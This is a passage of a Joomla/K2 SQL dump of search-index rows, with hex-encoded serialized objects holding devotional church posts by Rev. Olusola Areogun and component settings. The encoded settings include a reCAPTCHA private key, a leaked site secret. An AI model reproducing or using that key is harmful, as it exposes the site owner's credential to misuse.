20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223139223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a353a224661697468223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a31363a2235343a646976696e652d6167656e6461223b733a373a22636174736c7567223b733a373a22323a6661697468223b733a363a22617574686f72223b733a393a224c6966656f61736973223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a33353a22646976696e652d6167656e64612f6974656d2f35342d646976696e652d6167656e6461223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a393a224c6966656f61736973223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a393a224c6966656f61736973223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a353a224661697468223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a353a224661697468223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3534223b733a353a22726f757465223b733a36353a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d35343a646976696e652d6167656e6461264974656d69643d31313230223b733a353a227469746c65223b733a33343a22446976696e65204167656e646120666f7220447265616d2043656e747265204d656e223b733a31313a226465736372697074696f6e223b733a3132343a2220457665727920647265616d2063656e747265206d616e2073686f756c643a20312e204275696c6420746865697220686f75736520322e20506179206f666620616c6c20646562747320332e2048617665206120736176696e67206571756976616c656e7420746f2036206d6f6e746873e280992073616c61727920223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30372d30342032303a32323a3532223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30372d30342032303a32323a3532223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(288, 'index.php?option=com_k2&view=item&id=55', 'index.php?option=com_k2&view=item&id=55:divine-appointment', 'Keep your appointments daily with God - From our Father\'s Heart (16/07/2017)', ' Dearly Beloved, Keep your appointments daily with God. Those who keep their appointments with God have far more supernatural encounters and experiences than those who don’t. As a believer, the greatest battle you will face will be the battle to keep your personal appointments with God. ', '2017-07-16 10:11:32', '11b727bcd1035841de3819df6423d17b', 1, 1, 1, '*', '2017-07-16 09:55:43', '0000-00-00 00:00:00', '2017-07-16 09:55:43', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223535223b733a353a22616c696173223b733a31383a22646976696e652d6170706f696e746d656e74223b733a373a2273756d6d617279223b733a3330353a223c703e446561726c792042656c6f7665642c3c2f703e0d0a3c703e4b65657020796f7572206170706f696e746d656e7473206461696c79207769746820476f642e2054686f73652077686f206b656570207468656972206170706f696e746d656e7473207769746820476f64206861766520666172206d6f72652073757065726e61747572616c20656e636f756e7465727320616e6420657870657269656e636573207468616e2074686f73652077686f20646f6ee28099742e20417320612062656c69657665722c2074686520677265617465737420626174746c6520796f752077696c6c20666163652077696c6c2062652074686520626174746c6520746f206b65657020796f757220706572736f6e616c206170706f696e746d656e7473207769746820476f642e3c2f703e0d0a223b733a343a22626f6479223b733a323832323a220d0a3c703e54686520646576696c206b6e6f7773207468617420696620796f75206b65657020796f7572206170706f696e746d656e7473207769746820476f642c20796f752077696c6c206265636f6d6520756e64656665617461626c6520666f722068696d2e20546865726520697320616e20616e6f696e74696e67207468617420636f6d65732075706f6e20796f75207768656e20796f7520706572736f6e616c6c7920616e6420636f6e73697374656e746c792066656c6c6f7773686970207769746820476f6420616e642074686520656e656d792063616ee28099742062656174207468617420616e6f696e74696e672e3c2f703e0d0a3c703e5468652062757369657220796f75206265636f6d652c20746865206d6f72652074696d6520796f75206d757374207370656e64207769746820476f642e2054686520706c616e206f662074686520646576696c20697320746f206d616b6520796f7520736f2062757379207468617420796f752063616e6e6f74206576656e20686176652074696d6520666f7220476f64202c20736f2074686174207768656e2068652073686f777320757020696e20796f7572206c6966652c20796f752077696c6c206e6f7420626520726561647920666f722068696d2e3c2f703e0d0a3c703e54686572652069732074686520706c616365206f6620636f72706f726174652066656c6c6f77736869702c20686f77657665722074686572652069732074686520756e7175657374696f6e61626c6520616e642069727265706c61636561626c65206e65656420666f72206120706572736f6e616c2074696d65207769746820476f6420696e2070726179657220616e64204269626c6520737475647920746861742070726f64756365732073746162696c69747920696e20796f7572206c6966652e20596f752067657420746865206d6f7374206f6620636f72706f72617465206d656574696e677320696620796f75206d616b65206f75742074696d6520666f7220706572736f6e616c20616e642070726976617465206d656469746174696f6e20616e642066656c6c6f7773686970207769746820476f642e3c2f703e0d0a3c703e54686973206973737565207365656d7320736f20666f756e646174696f6e616c20627574206974206973206f6e65206f662074686f7365207468696e677320796f75206d757374206775617264206a65616c6f75736c7920696620796f752077696c6c20676f20666172207769746820476f642e205768656e6576657220492073656520616e796f6e652077686f207472697669616c697a65732068697320706572736f6e616c206170706f696e746d656e7420616e642066656c6c6f7773686970207769746820476f642c2049206b6e6f772074686174206d616e2077696c6c206e6f7420676f20666172207769746820476f6420657863657074206865206368616e6765732e3c2f703e0d0a3c703e4d61747572697479206f6620612062656c6965766572206973206e6f74206d65617375726564206f72207365656e20696e20746865206d616e69666573746174696f6e206f6620746865206769667473206f6620746865205370697269742c2062757420696e2063686172616374657220646576656c6f706d656e7420616e6420636861726163746572206973206275696c7420696e2074686520706c616365206f662066656c6c6f7773686970207769746820476f642e20496620796f752067657420736f206275737920647572696e6720746865206461792c2074616b652074696d65206f757420696e20746865206e6967687420746f206b65657020796f7572206170706f696e746d656e74207769746820476f642e20446f6ee2809974206c65742074686520646576696c2073706f6e736f7220796f75206f7574206f6620646976696e652072656c6576616e636520627920676976696e6720796f7520736174616e6963206f70656e20646f6f727320746861742077696c6c207475726e20796f7520696e746f20612064656e736520616e64207765616b2043687269737469616e2e3c2f703e0d0a3c703e50656f706c652077686f206861766520706f776572207769746820476f642074616b652074696d6520696e207468652077617463686573206f6620746865206e6967687420746f206b65657020646976696e65206170706f696e746d656e74732e204a61636f622068616420746f2077726573746c65207769746820476f6420616c6f6e6520616c6c207468726f75676820746865206e69676874206265666f72652068652068616420706f776572207769746820476f642e204865206b657074207468617420637269746963616c206170706f696e746d656e74207769746820476f64207768696368206368616e6765642068697320656e74697265206c69666520616e642064657374696e792e3c2f703e0d0a3c703e4d61726b2031207665727365203335207361797320e2809c20416e6420696e20746865206d6f726e696e672c20726973696e672075702061206772656174207768696c65206265666f7265206461792c2068652077656e74206f75742c20616e6420646570617274656420696e746f206120736f6c697461727920706c6163652c20616e6420746865726520707261796564e2809d2e3c2f703e0d0a3c703e45766572796f6e652074686174206772657720746f2062652061206769616e74206f6620476f642c20626f746820696e20746869732067656e65726174696f6e20616e6420696e2074686520706173742c2065766572796f6e65207468617420697320646f696e67206578706c6f69747320666f7220476f64206e6f772c2065766572796f6e65207468617420686173206265656e20636f6e73697374656e7420696e207468652043687269737469616e20726163652c20626520697420612070756c706974206d696e6973746572206f722068656c70206d696e69737465722c20616c6c206f66207468656d2068617665206f6e65207468696e6720696e20636f6d6d6f6e2077686963682069732074686520736f75726365206f6620746865697220737472656e67746820616e6420616368696576656d656e74732c2074686174206973207468652074696d652074686579207370656e6420696e2074686520636c6f736574207769746820746865204c6f726420616c6f6e652c20656974686572206465657020696e746f20746865206e69676874206f72206561726c7920696e20746865206d6f726e696e6720686f757273207768656e20746865206461792069732079657420746f20636f6d652e2054686f736520706572736f6e616c2074696d65207769746820746865204c6f72642068617665206265656e20726573706f6e7369626c6520666f72206d616b696e67207468656d20746f206265206d656e206f6620776f7274682c206d656e206f66207375627374616e636520616e64206d656e206f662076696f6c656e636520666f72636566756c6c7920616476616e63696e672074686520636f75727365206f662074686520466174686572e2809973206b696e67646f6d2e3c2f703e0d0a3c703e54616b65206865656420746f20796f757220706572736f6e616c206170706f696e746d656e74207769746820746865204c6f726420616e64206974207368616c6c2062652077656c6c207769746820796f7520696e204a65737573e28099206e616d652e3c2f703e0d0a3c703e54696c6c206e657874207765656b2c20676f20616e642077696e2077697468204a657375732e3c2f703e0d0a3c703e476f64e28099732053657276616e742c3c2f703e0d0a3c703e5265762e204f6c75736f6c61204172656f67756e2ec2a03c2f703e223b733a353a226361746964223b733a313a2235223b733a31303a22637265617465645f6279223b733a333a22313939223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30372d31362031303a31313a3332223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a22